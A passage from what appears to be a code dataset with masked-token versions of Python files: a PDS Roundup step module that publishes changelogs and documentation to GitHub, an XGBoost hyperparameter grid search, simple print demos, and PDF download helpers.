self.getRepository())\n tmpFileName = None\n try:\n release = repo.releases().next()\n fd, tmpFileName = tempfile.mkstemp('.zip')\n with zipfile.ZipFile(os.fdopen(fd, 'wb'), 'w') as zf:\n for folder, subdirs, filenames in os.walk(self.getDocDir()):\n for fn in filenames:\n path = os.path.join(folder, fn)\n if os.path.isfile(path):\n zf.write(path, path[len(self.getDocDir()) + 1:])\n for asset in release.assets():\n if asset.name == 'documentation.zip':\n asset.delete()\n break\n with open(tmpFileName, 'rb') as tmpFile:\n release.upload_asset('application/zip', 'documentation.zip',\n tmpFile, 'Documentation (zip)')\n except StopIteration:\n _logger.info(\n '🧐 No releases found at all, so I cannot publish documentation assets to them'\n )\n return\n finally:\n if tmpFileName is not None:\n os.remove(tmpFileName)\n",
"step-3": "<mask token>\n\n\nclass Step(object):\n <mask token>\n\n def __init__(self, assembly):\n \"\"\"Initialize a step with the given ``assembly``\"\"\"\n self.assembly = assembly\n\n def __repr__(self):\n return f'<{self.__class__.__name__}()>'\n\n def execute(self):\n raise NotImplementedError('Subclasses must implement ``execute``')\n\n def getRepository(self):\n \"\"\"Utility: get the name of the GitHub repository\"\"\"\n return self.assembly.context.environ.get('GITHUB_REPOSITORY').split('/'\n )[1]\n <mask token>\n <mask token>\n\n\nclass StepName(Enum):\n \"\"\"Enumerated identifiers for each of the possible steps of a roundup\"\"\"\n null = 'null'\n unitTest = 'unitTest'\n integrationTest = 'integrationTest'\n changeLog = 'changeLog'\n requirements = 'requirements'\n docs = 'docs'\n build = 'build'\n githubRelease = 'githubRelease'\n artifactPublication = 'artifactPublication'\n docPublication = 'docPublication'\n\n\nclass NullStep(Step):\n \"\"\"This is a \"null\" or \"no-op\" step that does nothing.\"\"\"\n\n def execute(self):\n pass\n\n\nclass ChangeLogStep(Step):\n \"\"\"This step generates a PDS-style changelog\"\"\"\n _sections = (\n '{\"improvements\":{\"prefix\":\"**Improvements:**\",\"labels\":[\"Epic\"]},\"defects\":{\"prefix\":\"**Defects:**\",\"labels\":[\"bug\"]},\"deprecations\":{\"prefix\":\"**Deprecations:**\",\"labels\":[\"deprecation\"]}}'\n )\n\n def execute(self):\n token = self.getToken()\n if not token:\n _logger.info(\n '🤷\\u200d♀️ No GitHub administrative token; cannot generate changelog'\n )\n return\n invoke(['github_changelog_generator', '--user', self.getOwner(),\n '--project', self.getRepository(), '--output', 'CHANGELOG.md',\n '--token', token, '--configure-sections', self._sections,\n '--no-pull-requests', '--issues-label',\n '**Other closed issues:**', '--issue-line-labels',\n 'high,low,medium'])\n commit('CHANGELOG.md', 'Update changelog')\n\n\nclass RequirementsStep(Step):\n \"\"\"This step generates a PDS-style requirements file\"\"\"\n\n def execute(self):\n token = self.getToken()\n if not token:\n _logger.info(\n '🤷\\u200d♀️ No GitHub administrative token; cannot generate requirements'\n )\n return\n argv = ['requirement-report', '--format', 'md', '--organization',\n self.getOwner(), '--repository', self.getRepository(),\n '--output', 'docs/requirements/', '--token', token]\n if not self.assembly.isStable():\n argv.append('--dev')\n generatedFile = invoke(argv).strip()\n if not generatedFile:\n _logger.warn(\n '🤨 Did not get a requirements file from the requirement-report; will skip it'\n )\n return\n commit(generatedFile, 'Update requirements')\n\n\nclass DocPublicationStep(Step):\n\n def getDocDir(self):\n raise NotImplementedError('Subclasses must implement ``getDocDir``')\n\n def execute(self):\n token = self.getToken()\n if not token:\n _logger.info(\n '🤷\\u200d♀️ No GitHub administrative token; cannot send doc artifacts to GitHub'\n )\n return\n github = github3.login(token=token)\n repo = github.repository(self.getOwner(), self.getRepository())\n tmpFileName = None\n try:\n release = repo.releases().next()\n fd, tmpFileName = tempfile.mkstemp('.zip')\n with zipfile.ZipFile(os.fdopen(fd, 'wb'), 'w') as zf:\n for folder, subdirs, filenames in os.walk(self.getDocDir()):\n for fn in filenames:\n path = os.path.join(folder, fn)\n if os.path.isfile(path):\n zf.write(path, path[len(self.getDocDir()) + 1:])\n for asset in release.assets():\n if asset.name == 'documentation.zip':\n asset.delete()\n break\n with open(tmpFileName, 'rb') as tmpFile:\n release.upload_asset('application/zip', 'documentation.zip',\n tmpFile, 'Documentation (zip)')\n except StopIteration:\n _logger.info(\n '🧐 No releases found at all, so I cannot publish documentation assets to them'\n )\n return\n finally:\n if tmpFileName is not None:\n os.remove(tmpFileName)\n",
"step-4": "<mask token>\n_logger = logging.getLogger(__name__)\n\n\nclass Step(object):\n \"\"\"An abstract step; executing steps comprises a roundup\"\"\"\n\n def __init__(self, assembly):\n \"\"\"Initialize a step with the given ``assembly``\"\"\"\n self.assembly = assembly\n\n def __repr__(self):\n return f'<{self.__class__.__name__}()>'\n\n def execute(self):\n raise NotImplementedError('Subclasses must implement ``execute``')\n\n def getRepository(self):\n \"\"\"Utility: get the name of the GitHub repository\"\"\"\n return self.assembly.context.environ.get('GITHUB_REPOSITORY').split('/'\n )[1]\n\n def getToken(self):\n \"\"\"Utility: get the administrative GitHub token\"\"\"\n return self.assembly.context.environ.get('ADMIN_GITHUB_TOKEN')\n\n def getOwner(self):\n \"\"\"Utility: return the owning user/organization of the repository in use\"\"\"\n return self.assembly.context.environ.get('GITHUB_REPOSITORY').split('/'\n )[0]\n\n\nclass StepName(Enum):\n \"\"\"Enumerated identifiers for each of the possible steps of a roundup\"\"\"\n null = 'null'\n unitTest = 'unitTest'\n integrationTest = 'integrationTest'\n changeLog = 'changeLog'\n requirements = 'requirements'\n docs = 'docs'\n build = 'build'\n githubRelease = 'githubRelease'\n artifactPublication = 'artifactPublication'\n docPublication = 'docPublication'\n\n\nclass NullStep(Step):\n \"\"\"This is a \"null\" or \"no-op\" step that does nothing.\"\"\"\n\n def execute(self):\n pass\n\n\nclass ChangeLogStep(Step):\n \"\"\"This step generates a PDS-style changelog\"\"\"\n _sections = (\n '{\"improvements\":{\"prefix\":\"**Improvements:**\",\"labels\":[\"Epic\"]},\"defects\":{\"prefix\":\"**Defects:**\",\"labels\":[\"bug\"]},\"deprecations\":{\"prefix\":\"**Deprecations:**\",\"labels\":[\"deprecation\"]}}'\n )\n\n def execute(self):\n token = self.getToken()\n if not token:\n _logger.info(\n '🤷\\u200d♀️ No GitHub administrative token; cannot generate changelog'\n )\n return\n invoke(['github_changelog_generator', '--user', self.getOwner(),\n '--project', self.getRepository(), '--output', 'CHANGELOG.md',\n '--token', token, '--configure-sections', self._sections,\n '--no-pull-requests', '--issues-label',\n '**Other closed issues:**', '--issue-line-labels',\n 'high,low,medium'])\n commit('CHANGELOG.md', 'Update changelog')\n\n\nclass RequirementsStep(Step):\n \"\"\"This step generates a PDS-style requirements file\"\"\"\n\n def execute(self):\n token = self.getToken()\n if not token:\n _logger.info(\n '🤷\\u200d♀️ No GitHub administrative token; cannot generate requirements'\n )\n return\n argv = ['requirement-report', '--format', 'md', '--organization',\n self.getOwner(), '--repository', self.getRepository(),\n '--output', 'docs/requirements/', '--token', token]\n if not self.assembly.isStable():\n argv.append('--dev')\n generatedFile = invoke(argv).strip()\n if not generatedFile:\n _logger.warn(\n '🤨 Did not get a requirements file from the requirement-report; will skip it'\n )\n return\n commit(generatedFile, 'Update requirements')\n\n\nclass DocPublicationStep(Step):\n\n def getDocDir(self):\n raise NotImplementedError('Subclasses must implement ``getDocDir``')\n\n def execute(self):\n token = self.getToken()\n if not token:\n _logger.info(\n '🤷\\u200d♀️ No GitHub administrative token; cannot send doc artifacts to GitHub'\n )\n return\n github = github3.login(token=token)\n repo = github.repository(self.getOwner(), self.getRepository())\n tmpFileName = None\n try:\n release = repo.releases().next()\n fd, tmpFileName = tempfile.mkstemp('.zip')\n with zipfile.ZipFile(os.fdopen(fd, 'wb'), 'w') as zf:\n for folder, subdirs, filenames in os.walk(self.getDocDir()):\n for fn in filenames:\n path = os.path.join(folder, fn)\n if os.path.isfile(path):\n zf.write(path, path[len(self.getDocDir()) + 1:])\n for asset in release.assets():\n if asset.name == 'documentation.zip':\n asset.delete()\n break\n with open(tmpFileName, 'rb') as tmpFile:\n release.upload_asset('application/zip', 'documentation.zip',\n tmpFile, 'Documentation (zip)')\n except StopIteration:\n _logger.info(\n '🧐 No releases found at all, so I cannot publish documentation assets to them'\n )\n return\n finally:\n if tmpFileName is not None:\n os.remove(tmpFileName)\n",
"step-5": "# encoding: utf-8\n\n'''🤠 PDS Roundup: A step takes you further towards a complete roundup'''\n\nfrom enum import Enum\nfrom .util import commit, invoke\nimport logging, github3, tempfile, zipfile, os\n\n_logger = logging.getLogger(__name__)\n\n\nclass Step(object):\n '''An abstract step; executing steps comprises a roundup'''\n def __init__(self, assembly):\n '''Initialize a step with the given ``assembly``'''\n self.assembly = assembly\n\n def __repr__(self):\n return f'<{self.__class__.__name__}()>'\n\n def execute(self):\n raise NotImplementedError('Subclasses must implement ``execute``')\n\n def getRepository(self):\n '''Utility: get the name of the GitHub repository'''\n return self.assembly.context.environ.get('GITHUB_REPOSITORY').split('/')[1]\n\n def getToken(self):\n '''Utility: get the administrative GitHub token'''\n return self.assembly.context.environ.get('ADMIN_GITHUB_TOKEN')\n\n def getOwner(self):\n '''Utility: return the owning user/organization of the repository in use'''\n return self.assembly.context.environ.get('GITHUB_REPOSITORY').split('/')[0]\n\n\nclass StepName(Enum):\n '''Enumerated identifiers for each of the possible steps of a roundup'''\n null = 'null'\n unitTest = 'unitTest'\n integrationTest = 'integrationTest'\n changeLog = 'changeLog'\n requirements = 'requirements'\n docs = 'docs'\n build = 'build'\n githubRelease = 'githubRelease'\n artifactPublication = 'artifactPublication'\n docPublication = 'docPublication'\n\n\n# Common Steps\n# ============\n#\n# The folowing are concrete Step classes that are shared between contexts;\n# i.e., they're independent of Python, Maven, etc.\n\n\nclass NullStep(Step):\n '''This is a \"null\" or \"no-op\" step that does nothing.'''\n def execute(self):\n pass\n # But for development, this sure is handy:\n # import pdb;pdb.set_trace()\n # import subprocess\n # subprocess.run('/bin/sh')\n\n\nclass ChangeLogStep(Step):\n '''This step generates a PDS-style changelog'''\n _sections = '{\"improvements\":{\"prefix\":\"**Improvements:**\",\"labels\":[\"Epic\"]},\"defects\":{\"prefix\":\"**Defects:**\",\"labels\":[\"bug\"]},\"deprecations\":{\"prefix\":\"**Deprecations:**\",\"labels\":[\"deprecation\"]}}'\n\n def execute(self):\n token = self.getToken()\n if not token:\n _logger.info('🤷♀️ No GitHub administrative token; cannot generate changelog')\n return\n invoke([\n 'github_changelog_generator',\n '--user',\n self.getOwner(),\n '--project',\n self.getRepository(),\n '--output',\n 'CHANGELOG.md',\n '--token',\n token,\n '--configure-sections',\n self._sections,\n '--no-pull-requests',\n '--issues-label',\n '**Other closed issues:**',\n '--issue-line-labels',\n 'high,low,medium'\n ])\n commit('CHANGELOG.md', 'Update changelog')\n\n\nclass RequirementsStep(Step):\n '''This step generates a PDS-style requirements file'''\n def execute(self):\n token = self.getToken()\n if not token:\n _logger.info('🤷♀️ No GitHub administrative token; cannot generate requirements')\n return\n argv = [\n 'requirement-report',\n '--format',\n 'md',\n '--organization',\n self.getOwner(),\n '--repository',\n self.getRepository(),\n '--output',\n 'docs/requirements/',\n '--token',\n token\n ]\n if not self.assembly.isStable():\n argv.append('--dev')\n generatedFile = invoke(argv).strip()\n if not generatedFile:\n _logger.warn('🤨 Did not get a requirements file from the requirement-report; will skip it')\n return\n commit(generatedFile, 'Update requirements')\n\n\nclass DocPublicationStep(Step):\n def getDocDir(self):\n raise NotImplementedError('Subclasses must implement ``getDocDir``')\n def execute(self):\n token = self.getToken()\n if not token:\n _logger.info('🤷♀️ No GitHub administrative token; cannot send doc artifacts to GitHub')\n return\n github = github3.login(token=token)\n repo = github.repository(self.getOwner(), self.getRepository())\n\n # 😮 TODO: There's a race here. This code is looking for the *latest* release, which\n # we assume was made by the earlier ``StepName.githubRelease`` step. It's possible someone\n # could create another release in between these steps! It'd be better if we fetched the\n # release being worked on directly.\n tmpFileName = None\n try:\n release = repo.releases().next() # ← here\n\n # Make a ZIP archive of the docs\n fd, tmpFileName = tempfile.mkstemp('.zip')\n with zipfile.ZipFile(os.fdopen(fd, 'wb'), 'w') as zf:\n for folder, subdirs, filenames in os.walk(self.getDocDir()):\n for fn in filenames:\n path = os.path.join(folder, fn)\n # Avoid things like Unix-domain sockets if they just happen to appear:\n if os.path.isfile(path):\n zf.write(path, path[len(self.getDocDir()) + 1:])\n\n # Remove any existing ``documentation.zip``\n for asset in release.assets():\n if asset.name == 'documentation.zip':\n asset.delete()\n break\n\n # Add the new ZIP file as a downloadable asset\n with open(tmpFileName, 'rb') as tmpFile:\n release.upload_asset('application/zip', 'documentation.zip', tmpFile, 'Documentation (zip)')\n\n except StopIteration:\n _logger.info('🧐 No releases found at all, so I cannot publish documentation assets to them')\n return\n finally:\n if tmpFileName is not None: os.remove(tmpFileName)\n",
"step-ids": [
15,
20,
21,
25,
27
]
}
|
[
15,
20,
21,
25,
27
] |
import numpy as np
import xgboost as xgb
from sklearn.grid_search import GridSearchCV #Performing grid search
import generateVector
from sklearn.model_selection import GroupKFold
from sklearn import preprocessing as pr
positiveFile="../dataset/full_data/positive.csv"
negativeFile="../dataset/full_data/negative.csv"
neutralFile="../dataset/full_data/neutral.csv"
X_model, Y_model = generateVector.loadMatrix(positiveFile, neutralFile, negativeFile, '2', '0', '-2')
X_model_scaled = pr.scale(X_model)
X_model_normalized = pr.normalize(X_model_scaled, norm='l2') # l2 norm
X_model = X_model_normalized
X_model = X_model.tolist()
testFold = []
for i in range(1, len(X_model) + 1):
if (i % 3 == 1) | (i % 3 == 2):
testFold.append(0)
else:
testFold.append(2)
#ps = PredefinedSplit(test_fold=testFold)
gkf = list(GroupKFold(n_splits=2).split(X_model, Y_model, testFold))
def param_Test1():
global X_model,Y_model,gkf
param_grid = {
'max_depth': [2,4,6,8,10],
'min_child_weight':[1,3,5,7],
# 'gamma':[i/10.0 for i in range(0,5)],
# 'subsample': [i / 10.0 for i in range(6, 10)],
# 'colsample_bytree': [i / 10.0 for i in range(6, 10)],
# 'reg_alpha': [1e-5, 1e-2, 0.1, 1, 100],
'n_estimators': [100]}
xgbclf = xgb.XGBClassifier(silent=0,objective="multi:softmax",learning_rate=0.1)
# Run Grid Search process
gs_clf = GridSearchCV(xgbclf, param_grid,n_jobs=-1,scoring='f1_weighted',cv=gkf)
gs_clf.fit(np.asarray(X_model), Y_model)
print gs_clf.best_params_,gs_clf.best_score_
print gs_clf.grid_scores_, gs_clf.best_params_, gs_clf.best_score_
best_parameters, score, _ = max(gs_clf.grid_scores_, key=lambda x: x[1])
print('score:', score)
for param_name in sorted(best_parameters.keys()):
print('%s: %r' % (param_name, best_parameters[param_name]))
#param_Test1()
#{'n_estimators': 100, 'max_depth': 4, 'min_child_weight': 3} 0.767260190997
def param_test2():
global X_model, Y_model, gkf
param_grid = {
'max_depth': [5,6,7],
'min_child_weight':[2,3,4],
# 'gamma':[i/10.0 for i in range(0,5)],
# 'subsample': [i / 10.0 for i in range(6, 10)],
# 'colsample_bytree': [i / 10.0 for i in range(6, 10)],
# 'reg_alpha': [1e-5, 1e-2, 0.1, 1, 100],
'n_estimators': [100]}
xgbclf = xgb.XGBClassifier(silent=0,objective="multi:softmax")
# Run Grid Search process
gs_clf = GridSearchCV(xgbclf, param_grid,
n_jobs=1,
scoring='f1_weighted',cv=gkf)
gs_clf.fit(np.asarray(X_model), Y_model)
print gs_clf.grid_scores_, gs_clf.best_params_, gs_clf.best_score_
best_parameters, score, _ = max(gs_clf.grid_scores_, key=lambda x: x[1])
print('score:', score)
for param_name in sorted(best_parameters.keys()):
print('%s: %r' % (param_name, best_parameters[param_name]))
#param_test2()
def paramTest2a():
global X_model, Y_model, gkf
param_grid = {
#'max_depth': [5, 6, 7],
#'learning_rate': [0.1, 0.15, 0.2, 0.3],
#'min_child_weight':[1,3,5,7],
# 'gamma':[i/10.0 for i in range(0,5)],
'subsample': [i / 10.0 for i in range(6, 10)],
'colsample_bytree': [i / 10.0 for i in range(6, 10)],
# 'reg_alpha': [1e-5, 1e-2, 0.1, 1, 100],
'n_estimators': [100]}
xgbclf = xgb.XGBClassifier(max_depth=5,min_child_weight=2,silent=0,learning_rate=0.1,objective="multi:softmax")
gs_clf = GridSearchCV(xgbclf, param_grid,
n_jobs=1,
scoring='f1_weighted',cv=gkf)
gs_clf.fit(np.asarray(X_model), Y_model)
print gs_clf.grid_scores_, gs_clf.best_params_, gs_clf.best_score_
best_parameters, score, _ = max(gs_clf.grid_scores_, key=lambda x: x[1])
print('score:', score)
for param_name in sorted(best_parameters.keys()):
print('%s: %r' % (param_name, best_parameters[param_name]))
#paramTest2a()
def paramTest2b():
global X_model, Y_model, gkf
param_grid = {
#'max_depth': [5, 6, 7],
# 'learning_rate': [0.1, 0.15, 0.2, 0.3],
#'min_child_weight': [1, 3, 5, 7],
#'gamma':[i/10.0 for i in range(0,5)],
'subsample': [i / 10.0 for i in range(6, 10)],
'colsample_bytree': [i / 10.0 for i in range(6, 10)],
# 'reg_alpha': [1e-5, 1e-2, 0.1, 1, 100],
'n_estimators': [100]}
xgbclf = xgb.XGBClassifier(silent=0, objective="multi:softmax",learning_rate=0.1,max_depth=7,min_child_weight=7)
# Run Grid Search process
gs_clf = GridSearchCV(xgbclf, param_grid,
n_jobs=1,
scoring='f1_weighted',cv=gkf)
gs_clf.fit(np.asarray(X_model), Y_model)
print gs_clf.grid_scores_, gs_clf.best_params_, gs_clf.best_score_
best_parameters, score, _ = max(gs_clf.grid_scores_, key=lambda x: x[1])
print('score:', score)
for param_name in sorted(best_parameters.keys()):
print('%s: %r' % (param_name, best_parameters[param_name]))
#paramTest2b()
def paramTest3():
global X_model, Y_model, gkf
param_grid = {
# 'max_depth': [5, 6, 7],
# 'learning_rate': [0.1, 0.15, 0.2, 0.3],
# 'min_child_weight': [1, 3, 5, 7],
'gamma':[i/10.0 for i in range(0,5)],
#'subsample': [i / 10.0 for i in range(6, 10)],
#'colsample_bytree': [i / 10.0 for i in range(6, 10)],
# 'reg_alpha': [1e-5, 1e-2, 0.1, 1, 100],
'n_estimators': [100]}
xgbclf = xgb.XGBClassifier(silent=0,objective="multi:softmax", learning_rate=0.1, max_depth=7, min_child_weight=7,
colsample_bytree=0.9,subsample=0.9)
# Run Grid Search process
gs_clf = GridSearchCV(xgbclf, param_grid,
n_jobs=1,
scoring='f1_weighted',cv=gkf)
gs_clf.fit(np.asarray(X_model), Y_model)
print gs_clf.grid_scores_, gs_clf.best_params_, gs_clf.best_score_
best_parameters, score, _ = max(gs_clf.grid_scores_, key=lambda x: x[1])
print('score:', score)
for param_name in sorted(best_parameters.keys()):
print('%s: %r' % (param_name, best_parameters[param_name]))
#paramTest3()
def paramTest4a():
global X_model, Y_model,gkf
param_grid = {
# 'max_depth': [5, 6, 7],
# 'learning_rate': [0.1, 0.15, 0.2, 0.3],
# 'min_child_weight': [1, 3, 5, 7],
# 'gamma': [i / 10.0 for i in range(0, 5)],
# 'subsample': [i / 10.0 for i in range(6, 10)],
# 'colsample_bytree': [i / 10.0 for i in range(6, 10)],
'reg_alpha': [1e-5, 1e-2, 0.1, 1, 100],
'n_estimators': [100]}
xgbclf = xgb.XGBClassifier(silent=0, learning_rate=0.1, max_depth=7, min_child_weight=7,gamma=0.1,
colsample_bytree=0.8, subsample=0.6,objective="multi:softmax")
# Run Grid Search process
gs_clf = GridSearchCV(xgbclf, param_grid,
n_jobs=1,
scoring='f1_weighted',cv=gkf)
gs_clf.fit(np.asarray(X_model), Y_model)
print gs_clf.grid_scores_, gs_clf.best_params_, gs_clf.best_score_
best_parameters, score, _ = max(gs_clf.grid_scores_, key=lambda x: x[1])
print('score:', score)
for param_name in sorted(best_parameters.keys()):
print('%s: %r' % (param_name, best_parameters[param_name]))
paramTest4a()
|
normal
|
{
"blob_id": "547844eca9eab097b814b0daa5da96d6a8ccee55",
"index": 5843,
"step-1": "import numpy as np\nimport xgboost as xgb\nfrom sklearn.grid_search import GridSearchCV #Performing grid search\nimport generateVector\nfrom sklearn.model_selection import GroupKFold\nfrom sklearn import preprocessing as pr\n\npositiveFile=\"../dataset/full_data/positive.csv\"\nnegativeFile=\"../dataset/full_data/negative.csv\"\nneutralFile=\"../dataset/full_data/neutral.csv\"\n\nX_model, Y_model = generateVector.loadMatrix(positiveFile, neutralFile, negativeFile, '2', '0', '-2')\nX_model_scaled = pr.scale(X_model)\nX_model_normalized = pr.normalize(X_model_scaled, norm='l2') # l2 norm\nX_model = X_model_normalized\nX_model = X_model.tolist()\n\ntestFold = []\nfor i in range(1, len(X_model) + 1):\n if (i % 3 == 1) | (i % 3 == 2):\n testFold.append(0)\n else:\n testFold.append(2)\n#ps = PredefinedSplit(test_fold=testFold)\ngkf = list(GroupKFold(n_splits=2).split(X_model, Y_model, testFold))\n\ndef param_Test1():\n global X_model,Y_model,gkf\n param_grid = {\n 'max_depth': [2,4,6,8,10],\n 'min_child_weight':[1,3,5,7],\n # 'gamma':[i/10.0 for i in range(0,5)],\n # 'subsample': [i / 10.0 for i in range(6, 10)],\n # 'colsample_bytree': [i / 10.0 for i in range(6, 10)],\n # 'reg_alpha': [1e-5, 1e-2, 0.1, 1, 100],\n 'n_estimators': [100]}\n xgbclf = xgb.XGBClassifier(silent=0,objective=\"multi:softmax\",learning_rate=0.1)\n\n # Run Grid Search process\n gs_clf = GridSearchCV(xgbclf, param_grid,n_jobs=-1,scoring='f1_weighted',cv=gkf)\n gs_clf.fit(np.asarray(X_model), Y_model)\n print gs_clf.best_params_,gs_clf.best_score_\n print gs_clf.grid_scores_, gs_clf.best_params_, gs_clf.best_score_\n best_parameters, score, _ = max(gs_clf.grid_scores_, key=lambda x: x[1])\n print('score:', score)\n for param_name in sorted(best_parameters.keys()):\n print('%s: %r' % (param_name, best_parameters[param_name]))\n\n#param_Test1()\n\n#{'n_estimators': 100, 'max_depth': 4, 'min_child_weight': 3} 0.767260190997\n\ndef param_test2():\n global X_model, Y_model, gkf\n param_grid = {\n 'max_depth': [5,6,7],\n 'min_child_weight':[2,3,4],\n # 'gamma':[i/10.0 for i in range(0,5)],\n # 'subsample': [i / 10.0 for i in range(6, 10)],\n # 'colsample_bytree': [i / 10.0 for i in range(6, 10)],\n # 'reg_alpha': [1e-5, 1e-2, 0.1, 1, 100],\n 'n_estimators': [100]}\n xgbclf = xgb.XGBClassifier(silent=0,objective=\"multi:softmax\")\n # Run Grid Search process\n\n gs_clf = GridSearchCV(xgbclf, param_grid,\n n_jobs=1,\n scoring='f1_weighted',cv=gkf)\n gs_clf.fit(np.asarray(X_model), Y_model)\n print gs_clf.grid_scores_, gs_clf.best_params_, gs_clf.best_score_\n best_parameters, score, _ = max(gs_clf.grid_scores_, key=lambda x: x[1])\n print('score:', score)\n for param_name in sorted(best_parameters.keys()):\n print('%s: %r' % (param_name, best_parameters[param_name]))\n\n#param_test2()\n\ndef paramTest2a():\n global X_model, Y_model, gkf\n param_grid = {\n #'max_depth': [5, 6, 7],\n #'learning_rate': [0.1, 0.15, 0.2, 0.3],\n #'min_child_weight':[1,3,5,7],\n # 'gamma':[i/10.0 for i in range(0,5)],\n 'subsample': [i / 10.0 for i in range(6, 10)],\n 'colsample_bytree': [i / 10.0 for i in range(6, 10)],\n # 'reg_alpha': [1e-5, 1e-2, 0.1, 1, 100],\n 'n_estimators': [100]}\n xgbclf = xgb.XGBClassifier(max_depth=5,min_child_weight=2,silent=0,learning_rate=0.1,objective=\"multi:softmax\")\n gs_clf = GridSearchCV(xgbclf, param_grid,\n n_jobs=1,\n scoring='f1_weighted',cv=gkf)\n gs_clf.fit(np.asarray(X_model), Y_model)\n print gs_clf.grid_scores_, gs_clf.best_params_, gs_clf.best_score_\n best_parameters, score, _ = max(gs_clf.grid_scores_, key=lambda x: x[1])\n print('score:', score)\n for param_name in sorted(best_parameters.keys()):\n print('%s: %r' % (param_name, best_parameters[param_name]))\n\n#paramTest2a()\n\ndef paramTest2b():\n global X_model, Y_model, gkf\n param_grid = {\n #'max_depth': [5, 6, 7],\n # 'learning_rate': [0.1, 0.15, 0.2, 0.3],\n #'min_child_weight': [1, 3, 5, 7],\n #'gamma':[i/10.0 for i in range(0,5)],\n 'subsample': [i / 10.0 for i in range(6, 10)],\n 'colsample_bytree': [i / 10.0 for i in range(6, 10)],\n # 'reg_alpha': [1e-5, 1e-2, 0.1, 1, 100],\n 'n_estimators': [100]}\n xgbclf = xgb.XGBClassifier(silent=0, objective=\"multi:softmax\",learning_rate=0.1,max_depth=7,min_child_weight=7)\n # Run Grid Search process\n gs_clf = GridSearchCV(xgbclf, param_grid,\n n_jobs=1,\n scoring='f1_weighted',cv=gkf)\n gs_clf.fit(np.asarray(X_model), Y_model)\n print gs_clf.grid_scores_, gs_clf.best_params_, gs_clf.best_score_\n best_parameters, score, _ = max(gs_clf.grid_scores_, key=lambda x: x[1])\n print('score:', score)\n for param_name in sorted(best_parameters.keys()):\n print('%s: %r' % (param_name, best_parameters[param_name]))\n\n#paramTest2b()\n\ndef paramTest3():\n global X_model, Y_model, gkf\n param_grid = {\n # 'max_depth': [5, 6, 7],\n # 'learning_rate': [0.1, 0.15, 0.2, 0.3],\n # 'min_child_weight': [1, 3, 5, 7],\n 'gamma':[i/10.0 for i in range(0,5)],\n #'subsample': [i / 10.0 for i in range(6, 10)],\n #'colsample_bytree': [i / 10.0 for i in range(6, 10)],\n # 'reg_alpha': [1e-5, 1e-2, 0.1, 1, 100],\n 'n_estimators': [100]}\n xgbclf = xgb.XGBClassifier(silent=0,objective=\"multi:softmax\", learning_rate=0.1, max_depth=7, min_child_weight=7,\n colsample_bytree=0.9,subsample=0.9)\n # Run Grid Search process\n gs_clf = GridSearchCV(xgbclf, param_grid,\n n_jobs=1,\n scoring='f1_weighted',cv=gkf)\n gs_clf.fit(np.asarray(X_model), Y_model)\n print gs_clf.grid_scores_, gs_clf.best_params_, gs_clf.best_score_\n best_parameters, score, _ = max(gs_clf.grid_scores_, key=lambda x: x[1])\n print('score:', score)\n for param_name in sorted(best_parameters.keys()):\n print('%s: %r' % (param_name, best_parameters[param_name]))\n\n#paramTest3()\n\ndef paramTest4a():\n global X_model, Y_model,gkf\n param_grid = {\n # 'max_depth': [5, 6, 7],\n # 'learning_rate': [0.1, 0.15, 0.2, 0.3],\n # 'min_child_weight': [1, 3, 5, 7],\n # 'gamma': [i / 10.0 for i in range(0, 5)],\n # 'subsample': [i / 10.0 for i in range(6, 10)],\n # 'colsample_bytree': [i / 10.0 for i in range(6, 10)],\n 'reg_alpha': [1e-5, 1e-2, 0.1, 1, 100],\n 'n_estimators': [100]}\n xgbclf = xgb.XGBClassifier(silent=0, learning_rate=0.1, max_depth=7, min_child_weight=7,gamma=0.1,\n colsample_bytree=0.8, subsample=0.6,objective=\"multi:softmax\")\n # Run Grid Search process\n gs_clf = GridSearchCV(xgbclf, param_grid,\n n_jobs=1,\n scoring='f1_weighted',cv=gkf)\n gs_clf.fit(np.asarray(X_model), Y_model)\n print gs_clf.grid_scores_, gs_clf.best_params_, gs_clf.best_score_\n best_parameters, score, _ = max(gs_clf.grid_scores_, key=lambda x: x[1])\n print('score:', score)\n for param_name in sorted(best_parameters.keys()):\n print('%s: %r' % (param_name, best_parameters[param_name]))\n\nparamTest4a()\n\n\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
def func():
print("这是无参数的打印")
func()
def func1(a):
print(f"这是有参数的打印:{a}")
func1("有参数a")
def func2(a, b):
return a + b
print(f"有返回值打印:{func2(3, 2)}")
def func3(a, b):
return
print(f"无返回值打印:{func3(3, 2)}")
|
normal
|
{
"blob_id": "be892250c31198e801836dba24fa8218dd50e811",
"index": 1178,
"step-1": "<mask token>\n\n\ndef func3(a, b):\n return\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef func1(a):\n print(f'这是有参数的打印:{a}')\n\n\n<mask token>\n\n\ndef func2(a, b):\n return a + b\n\n\n<mask token>\n\n\ndef func3(a, b):\n return\n\n\n<mask token>\n",
"step-3": "def func():\n print('这是无参数的打印')\n\n\n<mask token>\n\n\ndef func1(a):\n print(f'这是有参数的打印:{a}')\n\n\n<mask token>\n\n\ndef func2(a, b):\n return a + b\n\n\n<mask token>\n\n\ndef func3(a, b):\n return\n\n\n<mask token>\n",
"step-4": "def func():\n print('这是无参数的打印')\n\n\nfunc()\n\n\ndef func1(a):\n print(f'这是有参数的打印:{a}')\n\n\nfunc1('有参数a')\n\n\ndef func2(a, b):\n return a + b\n\n\nprint(f'有返回值打印:{func2(3, 2)}')\n\n\ndef func3(a, b):\n return\n\n\nprint(f'无返回值打印:{func3(3, 2)}')\n",
"step-5": "def func():\n print(\"这是无参数的打印\")\n\n\nfunc()\n\n\ndef func1(a):\n print(f\"这是有参数的打印:{a}\")\n\n\nfunc1(\"有参数a\")\n\n\ndef func2(a, b):\n return a + b\n\n\nprint(f\"有返回值打印:{func2(3, 2)}\")\n\n\ndef func3(a, b):\n return\n\n\nprint(f\"无返回值打印:{func3(3, 2)}\")\n",
"step-ids": [
1,
3,
4,
5,
6
]
}
|
[
1,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
def download_pdf(url, folder, name):
r = requests.get(url, allow_redirects=True)
file_path = join(folder, name + '.pdf')
open(file_path, 'wb').write(r.content)
return file_path
<|reserved_special_token_0|>
def pdf_2_images(url, dest_path):
new_file, filename = download_pdf_to_temp(url)
save_pdf_image(filename, dest_path)
os.close(new_file)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def download_pdf(url, folder, name):
r = requests.get(url, allow_redirects=True)
file_path = join(folder, name + '.pdf')
open(file_path, 'wb').write(r.content)
return file_path
def download_pdf_to_temp(url):
new_file, filename = tempfile.mkstemp()
r = requests.get(url, allow_redirects=True)
os.write(new_file, r.content)
